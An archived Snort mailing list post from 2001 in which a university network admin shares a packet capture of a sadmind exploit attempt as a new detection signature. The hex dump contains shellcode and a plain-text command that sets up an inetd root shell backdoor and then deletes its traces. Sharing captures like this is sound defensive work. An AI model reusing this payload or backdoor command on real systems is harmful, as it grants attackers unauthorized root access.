Snort mailing list archives
Different sadmind exploit
From: "Mayers, Philip J" <p.mayers () ic ac uk>
Date: Fri, 27 Jul 2001 12:19:33 +0100
We're seeing a new signature for the sadmind exploit:
Internet Protocol
Version: 4
Header length: 20 bytes
Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
0000 00.. = Differentiated Services Codepoint: Default (0x00)
.... ..0. = ECN-Capable Transport (ECT): 0
.... ...0 = ECN-CE: 0
Total Length: 1440
Identification: 0x2ab5
Flags: 0x04
.1.. = Don't fragment: Set
..0. = More fragments: Not set
Fragment offset: 0
Time to live: 237
Protocol: UDP (0x11)
Header checksum: 0xfcc3 (correct)
Source: 206.173.228.101 (206.173.228.101)
Destination: XXX.XXX.XXX.XXX (XXX.XXX.XXX.XXX)
User Datagram Protocol
Source port: 42515 (42515)
Destination port: 32772 (32772)
Length: 1420
Checksum: 0x3e3b (correct)
Data (1412 bytes)
0 3b63 1f04 0000 0000 0000 0002 0001 8788 ;c..............
10 0000 000a 0000 0001 0000 0001 0000 0020 ...............
20 3b61 3d2e 0000 0009 6c6f 6361 6c68 6f73 ;a=.....localhos
30 7400 0000 0000 0000 0000 0000 0000 0000 t...............
40 0000 0000 0000 0000 0000 0000 0000 0000 ................
50 0000 0000 0000 0000 0000 0000 0000 0000 ................
60 0000 0000 0000 0006 0000 0000 0000 0000 ................
70 0000 0000 0000 0004 0000 0000 0000 0004 ................
80 0000 0000 0000 0000 0000 0000 0000 0004 ................
90 0000 0000 0000 0000 0000 0000 0000 0000 ................
a0 0000 0000 0000 0000 0000 0000 0000 0000 ................
b0 0000 0000 0000 0000 0000 0000 0000 0000 ................
c0 0000 04a9 0000 000e 4144 4d5f 4657 5f56 ........ADM_FW_V
d0 4552 5349 4f4e 0000 0000 0003 0000 0004 ERSION..........
e0 0000 0001 0000 0000 0000 0000 0000 0011 ................
f0 4144 4d5f 434c 4945 4e54 5f44 4f4d 4149 ADM_CLIENT_DOMAI
100 4e00 0000 0000 0009 0000 0434 0000 0434 N..........4...4
110 ffff ffff efff a848 efff 9830 efff a848 .......H...0...H
<skip 0x200 bytes of same>
330 efff 9830 efff a848 efff 9830 efff a848 ...0...H...0...H
340 efff 9830 801b c00f 801b c00f 801b c00f ...0............
<skip 0x100 bytes of same>
460 801b c00f 801b c00f 20bf ffff 20bf ffff ........ ... ...
470 7fff ffff 9003 e05c 9222 2010 941b c00f .......\." .....
480 ec02 3ff0 ac22 8016 ae02 6010 ee22 3ff0 ..?.."....`.."?.
490 ae05 e008 c02d ffff ee22 3ff4 ae05 e003 .....-..."?.....
4a0 c02d ffff ee22 3ff8 ae05 c016 c02d ffff .-..."?......-..
4b0 c022 3ffc 8210 203b 91d0 2008 ffff ff95 ."?... ;.. .....
4c0 ffff ffff ffff ffff ffff ffff 2f62 696e ............/bin
4d0 2f73 68ff 2d63 ff65 6368 6f20 2770 6373 /sh.-c.echo 'pcs
4e0 6572 7665 7220 7374 7265 616d 2074 6370 erver stream tcp
4f0 206e 6f77 6169 7420 726f 6f74 202f 6269 nowait root /bi
500 6e2f 7368 2073 6820 2d69 2720 3e20 2f74 n/sh sh -i' > /t
510 6d70 2f2e 663b 202f 7573 722f 7362 696e mp/.f; /usr/sbin
520 2f69 6e65 7464 202d 7320 2f74 6d70 2f2e /inetd -s /tmp/.
530 663b 2072 6d20 2d66 202f 746d 702f 2e66 f; rm -f /tmp/.f
540 3bff ffff 0000 0000 0000 0000 0000 0009 ;...............
550 4144 4d5f 4645 4e43 4500 0000 0000 0003 ADM_FENCE.......
560 0000 0004 0000 029a 0000 0000 0000 0000 ................
570 0000 0010 6e65 746d 6774 5f65 6e64 6f66 ....netmgt_endof
580 6172 6773 args
Interestingly, there's no query to portmap immediately before this - ruserd
was running on this port, for example. The attacker seems to be guessing the
port. As I write, he's sweeping our class B.
Regards,
Phil
+----------------------------------+
| Phil Mayers, Network Support |
| Centre for Computing Services |
| Imperial College |
+----------------------------------+
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
http://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- Different sadmind exploit Mayers, Philip J (Jul 27)